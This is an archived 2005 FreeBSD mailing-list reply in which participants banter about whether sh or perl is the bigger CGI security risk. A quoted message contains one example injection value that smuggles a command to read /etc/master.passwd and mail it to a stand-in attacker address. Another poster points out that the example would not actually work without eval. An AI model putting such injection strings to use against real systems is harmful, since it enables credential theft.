Date: Fri, 4 Feb 2005 22:19:18 -0800 From: "Loren M. Lang" <lorenl@alzatex.com> To: Dan Nelson <dnelson@allantgroup.com> Cc: freebsd-questions@freebsd.org Subject: Re: perl and ports Message-ID: <20050205061918.GG8619@alzatex.com> In-Reply-To: <20050205041344.GK25463@dan.emsphone.com> References: <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <ef60af0905012500265eb38b66@mail.gmail.com> <EB3282A396FFCC78382D2E81@utd49554.utdallas.edu> <ef60af090501251100472d6fb6@mail.gmail.com> <20050125194736.GD76109@xor.obsecurity.org> <ef60af09050125142353301be4@mail.gmail.com> <ef60af09050125144166ecaae4@mail.gmail.com> <20050205034440.GF8619@alzatex.com> <20050205041344.GK25463@dan.emsphone.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On Fri, Feb 04, 2005 at 10:13:45PM -0600, Dan Nelson wrote: > In the last episode (Feb 04), Loren M. Lang said: > > Actually, I think you should work on sh first, it's a much bigger > > security hazard than perl. If you've ever written much sh, you'd > > realize with it's much loser syntax, it's easy to get into trouble. > > At least perl provides use strict and -Tw. Someone using sh to write > > cgi scripts is the worst. Imagine someone writing the following like > > for a sh cgi script where $USERNAME is a cgi paramater passed into > > the following script: > > > > echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>" > > > > What if someone wrote the following username and apache was running as > > root: > > > > charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo > > Then you would get a web page containing: > > <HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo</TITLE></HEAD> > > . The shell doesn't re-interpret its input unless explicitly told to > via the "eval" command. /bin/sh is a little limited for more complex > scripts due to its lack of arrays, though, so zsh/ksh/bash are much > better choices :) Well, my email was meant as a joke and I didn't bother to validate anything I wrote, I just remember reading something along these lines in a cgi book warning of the dangers of sh scripting for cgi scripts. The original example was more elaborate and probably did use eval, but my point is that sh can be more dangerous than perl since it uses a looser syntax. By not using "'s around $USERNAME, it will end up being parsed as multiple arguments which, for echo, isn't a big deal, but for most commands you can end up shooting your self in the foot. I definetly would not recommend removing it from the system or even recommend against using it for anything, but just pointing at the irony of considering perl a giant security hole. Mostly, I have just found this whole thread very humorous, and I wonder what the reaction of the developers will be when he trys asking them to stop using perl. > > -- > Dan Nelson > dnelson@allantgroup.com -- I sense much NT in you. NT leads to Bluescreen. Bluescreen leads to downtime. Downtime leads to suffering. NT is the path to the darkside. Powerful Unix is. Public Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc Fingerprint: B3B9 D669 69C9 09EC 1BCD 835A FAF3 7A46 E4A3 280C
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20050205061918.GG8619>